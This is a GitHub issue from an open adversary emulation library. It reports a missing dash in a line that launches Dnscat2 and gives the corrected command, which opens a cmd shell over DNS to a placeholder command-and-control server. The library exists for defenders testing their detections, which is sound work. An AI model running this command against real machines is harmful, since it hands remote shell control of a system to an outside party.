center-for-threat-informed-defense / adversary_emulation_library

An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.

Home Page:https://ctid.io/adversary-emulation

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Wrong Option Flag for Dnscat2

shinsugarfj opened this issue · comments

Start-Dnscat2 -Domain #{dnscat2_server} Exec cmd

Line 750 above has a wrong option flag for Start-Dnscat2 cmdlet. Please fix the line as follows:

        Start-Dnscat2 -Domain #{dnscat2_server} -Exec cmd
  • Exec -> -Exec